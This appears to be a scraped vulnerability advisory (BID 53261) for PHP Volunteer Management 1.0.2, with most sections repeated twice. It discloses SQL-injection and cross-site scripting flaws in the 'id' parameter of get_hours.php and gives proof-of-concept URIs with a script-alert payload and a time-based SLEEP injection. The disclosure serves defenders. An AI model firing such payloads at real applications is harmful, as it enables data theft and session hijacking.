PHP Volunteer Management SQL Injection and Cross Site Scripting Vulnerabilities
BID:53261
Info
PHP Volunteer Management SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 53261 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-6504 CVE-2012-6505 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 26 2012 12:00AM |
| Updated: | Mar 19 2015 07:35AM |
| Credit: | G13 |
| Vulnerable: |
SourceForge PHP Volunteer Management 1.0.2 |
| Not Vulnerable: | |
Discussion
PHP Volunteer Management SQL Injection and Cross Site Scripting Vulnerabilities
PHP Volunteer Management is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Volunteer Management 1.0.2 is vulnerable; other versions may also be affected.
PHP Volunteer Management is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Volunteer Management 1.0.2 is vulnerable; other versions may also be affected.
Exploit / POC
PHP Volunteer Management SQL Injection and Cross Site Scripting Vulnerabilities
Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.
The following example URIs are available:
Cross-site scripting:
http://www.example.com/mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10
http://www.example.com/mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10
SQL-injection:
http://www.example.com/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
http://www.example.com/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.
The following example URIs are available:
Cross-site scripting:
http://www.example.com/mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10
http://www.example.com/mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10
SQL-injection:
http://www.example.com/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
http://www.example.com/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
Solution / Fix
PHP Volunteer Management SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP Volunteer Management SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- PHP Volunteer Management Download page (sourceforge)
- PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities (Thomas Richards)